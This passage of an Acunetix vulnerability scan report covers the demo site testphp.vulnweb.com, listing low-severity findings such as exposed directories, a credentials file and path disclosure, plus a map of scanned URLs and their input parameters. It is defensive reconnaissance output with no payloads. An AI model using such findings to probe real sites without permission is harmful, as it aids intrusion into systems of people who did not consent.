Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

pass=DauQfld4&uname=1xEv7vXg


Possible sensitive directories

Severity: Low
Type: Validation
Reported by module: Scripting (Possible_Sensitive_Directories.script)

Description
A possible sensitive directory has been found. This directory is not directly linked from the website. This check looks for common sensitive resources like backup directories, database dumps, administration pages, temporary directories. Each one of these directories could help an attacker to learn more about his target.

Impact
This directory may expose sensitive information that could help a malicious user to prepare more advanced attacks.

Recommendation
Restrict access to this directory or remove it from the website.

References
Web Server Security and Database Server Security

Affected items

/admin
Details
No details are available.
Request headers
GET /admin HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

/CVS
Details
No details are available.
Request headers
GET /CVS HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

/secured
Details
No details are available.
Request headers
GET /secured HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)


Possible sensitive files


Severity: Low
Type: Validation
Reported by module: Scripting (Possible_Sensitive_Files.script)

Description
A possible sensitive file has been found. This file is not directly linked from the website. This check looks for common sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.

Impact
This file may expose sensitive information that could help a malicious user to prepare more advanced attacks.

Recommendation
Restrict access to this file or remove it from the website.

References
Web Server Security and Database Server Security

Affected items

/hpp/test.php
Details: No details are available.
Request headers:
GET /hpp/test.php HTTP/1.1
Accept: acunetix/wvs
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

/Mod_Rewrite_Shop/.htaccess
Details: No details are available.
Request headers:
GET /Mod_Rewrite_Shop/.htaccess HTTP/1.1
Accept: acunetix/wvs
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)


Possible virtual host found


Severity: Low
Type: Configuration
Reported by module: Scripting (VirtualHost_Audit.script)

Description
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server (or pool of servers). This allows one server to share its resources, such as memory and processor cycles, without requiring all services provided to use the same host name. This web server is responding differently when the Host header is manipulated and various common virtual hosts are tested. This could indicate there is a Virtual Host present.

Impact
Possible sensitive information disclosure.

Recommendation
Consult the virtual host configuration and check if this virtual host should be publicly accessible.

References
Virtual hosting

Affected items

localhost
Details:
VirtualHost: localhost
Response:
<p>For online documentation and support please refer to <a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at <a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
Request headers:
GET / HTTP/1.0
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Broken links
Severity: Informational
Type: Informational
Reported by module: Crawler

Description
A broken link refers to any link that should take you to a document, image or webpage, that actually results in an error. This page was linked from the website but it is inaccessible.

Impact
Problems navigating the site.

Recommendation
Remove the links to this file or make it accessible.

Affected items

/medias/css/main.css
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /medias/css/main.css HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/medias/js/common_functions.js
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /medias/js/common_functions.js HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Mod_Rewrite_Shop/Details/color-printer/3
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /Mod_Rewrite_Shop/Details/color-printer/3/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Mod_Rewrite_Shop/Details/web-camera-a4tech/2
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/privacy.php
Details: For a complete list of URLs linking to this file, go to Site Structure > Locate and select the file (marked as "Not Found") > select Referrers Tab from the bottom of the Information pane.
Request headers:
GET /privacy.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Email address found


Severity: Informational
Type: Informational
Reported by module: Scripting (Text_Search_Dir.script)

Description
One or more email addresses have been found on this page. The majority of spam comes from email addresses harvested off the internet. The spam-bots (also known as email harvesters and email extractors) are programs that scour the internet looking for email addresses on any website they come across. Spambot programs look for strings like myname@mydomain.com and then record any addresses found.

Impact
Email addresses posted on Web sites may attract spam.

Recommendation
Check references for details on how to solve this problem.

References
Email Address Disclosed on Website Can be Used for Spam

Affected items

/
Details: Pattern found: wvs@acunetix.com
Request headers:
GET / HTTP/1.1
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/artists.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /artists.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/cart.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /cart.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/categories.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /categories.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/disclaimer.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /disclaimer.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/guestbook.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /guestbook.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/index.bak
Details: Pattern found: wasp@acunetix.com
Request headers:
GET /index.bak HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/index.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/index.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /index.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/listproducts.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /listproducts.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/search.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/login.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /login.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/product.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /product.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/search.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/search.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /search.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/signup.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/Templates/main_dynamic_template.dwt.php
Details: Pattern found: wvs@acunetix.com
Request headers:
GET /Templates/main_dynamic_template.dwt.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


GHDB: Sablotron error message


Severity: Informational
Type: Informational
Reported by module: GHDB

Description
The description for this alert is contributed by the GHDB community; it may contain inappropriate language.
Category: Error Messages
Sablotron is an XML toolkit thingie. This query hones in on error messages generated by this toolkit. These error messages reveal all sorts of interesting stuff such as source code snippets, path and filename info, etc.
The Google Hacking Database (GHDB) appears courtesy of the Google Hacking community.

Impact
Not available. Check description.

Recommendation
Not available. Check description.

References
Acunetix Google hacking
The Google Hacking Database (GHDB) community

Affected items

/pictures/path-disclosure-unix.html
Details: We found warning "error on line" php sablotron
Request headers:
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Password type input with auto-complete enabled


Severity: Informational
Type: Informational
Reported by module: Crawler

Description
When a new name and password is entered in a form and the form is submitted, the browser asks if the password should be saved. Thereafter when the form is displayed, the name and password are filled in automatically or are completed as the name is entered. An attacker with local access could obtain the cleartext password from the browser cache.

Impact
Possible sensitive information disclosure.

Recommendation
The password auto-complete should be disabled in sensitive applications. To disable auto-complete, you may use a code similar to:
<INPUT TYPE="password" AUTOCOMPLETE="off">

Affected items

/login.php
Details: Password type input named pass from form named loginform with action userinfo.php has autocomplete enabled.
Request headers:
GET /login.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/signup.php
Details: Password type input named upass2 from form named form1 with action /secured/newuser.php has autocomplete enabled.
Request headers:
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*

/signup.php
Details: Password type input named upass from form named form1 with action /secured/newuser.php has autocomplete enabled.
Request headers:
GET /signup.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Possible internal IP address disclosure


Severity: Informational
Type: Informational
Reported by module: Scripting (Text_Search_File.script)

Description
A string matching an internal IPv4 address was found on this page. This may disclose information about the IP addressing scheme of the internal network. This information can be used to conduct further attacks. This alert may be a false positive; manual confirmation is required.

Impact
Possible sensitive information disclosure.

Recommendation
Prevent this information from being displayed to the user.

Affected items

/pictures/ipaddresses.txt
Details: Pattern found: 192.168.0.26
Request headers:
GET /pictures/ipaddresses.txt HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Possible server path disclosure (Unix)


Severity: Informational
Type: Informational
Reported by module: Scripting (Text_Search_File.script)

Description
One or more fully qualified path names were found on this page. From this information the attacker may learn the file system structure from the web server. This information can be used to conduct further attacks. This alert may be a false positive; manual confirmation is required.

Impact
Possible sensitive information disclosure.

Recommendation
Prevent this information from being displayed to the user.

Affected items

/pictures/path-disclosure-unix.html
Details: Pattern found: /usr/local/etc/httpd/htdocs2/destination
Request headers:
GET /pictures/path-disclosure-unix.html HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Possible username or password disclosure


Severity: Informational
Type: Informational
Reported by module: Scripting (Text_Search_File.script)

Description
A username and/or password was found in this file. This information could be sensitive. This alert may be a false positive; manual confirmation is required.

Impact
Possible sensitive information disclosure.

Recommendation
Remove this file from your website or change its permissions to remove access.

Affected items

/pictures/credentials.txt
Details: Pattern found: password=something
Request headers:
GET /pictures/credentials.txt HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/pictures/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept: */*


Scanned items (coverage report)


Scanned 89 URLs. Found 45 vulnerable.

URL: http://testphp.vulnweb.com/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/search.php
  Vulnerabilities have been identified for this URL. 3 input(s) found for this URL.
  Input scheme 1: test (URL encoded GET), goButton (URL encoded POST), searchFor (URL encoded POST)

URL: http://testphp.vulnweb.com/hpp/
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: pp (URL encoded GET)

URL: http://testphp.vulnweb.com/hpp/params.php
  Vulnerabilities have been identified for this URL. 3 input(s) found for this URL.
  Input scheme 1: aaaa/ (URL encoded GET)
  Input scheme 2: p (URL encoded GET), pp (URL encoded GET)

URL: http://testphp.vulnweb.com/hpp/test.php
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/cart.php
  Vulnerabilities have been identified for this URL. 2 input(s) found for this URL.
  Input scheme 1: addcart (URL encoded POST), price (URL encoded POST)

URL: http://testphp.vulnweb.com/index.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/login.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/style.css
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/artists.php
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: artist (URL encoded GET)

URL: http://testphp.vulnweb.com/privacy.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/userinfo.php
  Vulnerabilities have been identified for this URL. 2 input(s) found for this URL.
  Input scheme 1: pass (URL encoded POST), uname (URL encoded POST)

URL: http://testphp.vulnweb.com/guestbook.php
  Vulnerabilities have been identified for this URL. 3 input(s) found for this URL.
  Input scheme 1: name (URL encoded POST), submit (URL encoded POST), text (URL encoded POST)

URL: http://testphp.vulnweb.com/categories.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Flash/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Flash/add.swf
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Flash/add.fla
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/index.php
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/styles.css
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/artists.php
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/infoartist.php?id=1
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: id (URL encoded GET)

URL: http://testphp.vulnweb.com/AJAX/categories.php
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/infocateg.php?id=1
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: id (URL encoded GET)

URL: http://testphp.vulnweb.com/AJAX/titles.php
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/AJAX/infotitle.php
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: id (URL encoded POST)

URL: http://testphp.vulnweb.com/AJAX/showxml.php
  No vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: text/xml (Custom POST)

URL: http://testphp.vulnweb.com/disclaimer.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.


URL: http://testphp.vulnweb.com/images/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Mod_Rewrite_Shop/.htaccess
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/product.php
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: pic (URL encoded GET)

URL: http://testphp.vulnweb.com/showimage.php
  Vulnerabilities have been identified for this URL. 3 input(s) found for this URL.
  Input scheme 1: file (URL encoded GET), size (URL encoded GET)
  Input scheme 2: file (URL encoded GET)

URL: http://testphp.vulnweb.com/listproducts.php
  Vulnerabilities have been identified for this URL. 2 input(s) found for this URL.
  Input scheme 1: cat (URL encoded GET)
  Input scheme 2: artist (URL encoded GET)

URL: http://testphp.vulnweb.com/signup.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/redir.php
  Vulnerabilities have been identified for this URL. 1 input(s) found for this URL.
  Input scheme 1: r (URL encoded GET)

URL: http://testphp.vulnweb.com/Templates/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/crossdomain.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/secured/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/secured/newuser.php
  Vulnerabilities have been identified for this URL. 9 input(s) found for this URL.
  Input scheme 1: signup, uaddress, ucc, uemail, upass, upass2, uphone, urname, uuname (all URL encoded POST)

URL: http://testphp.vulnweb.com/secured/style.css
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/comment.php
  Vulnerabilities have been identified for this URL. 6 input(s) found for this URL.
  Input scheme 1: aid (URL encoded GET)
  Input scheme 2: pid (URL encoded GET)
  Input scheme 3: comment (URL encoded POST), name (URL encoded POST), phpaction (URL encoded POST), Submit (URL encoded POST)

URL: http://testphp.vulnweb.com/pictures/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/8.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/1.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/7.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/6.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/4.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/3.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/5.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/2.jpg.tn
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.


URL: http://testphp.vulnweb.com/pictures/WS_FTP.LOG
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/wp-config.bak
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/ipaddresses.txt
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/credentials.txt
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/path-disclosure-win.html
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/pictures/path-disclosure-unix.html
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/index.bak
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/workspace.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/vcs.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/scopes/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/acuart.iml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/misc.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/.idea/modules.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.


URL: http://testphp.vulnweb.com/.idea/encodings.xml
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/admin/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/admin/create.sql
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/CVS/
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/CVS/Root
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/CVS/Entries
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/CVS/Repository
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/CVS/Entries.Log
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias/img
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias/css
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias/css/main.css
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias/js
  No vulnerabilities have been identified for this URL. No input(s) found for this URL.

URL: http://testphp.vulnweb.com/medias/js/common_functions.js
  Vulnerabilities have been identified for this URL. No input(s) found for this URL.

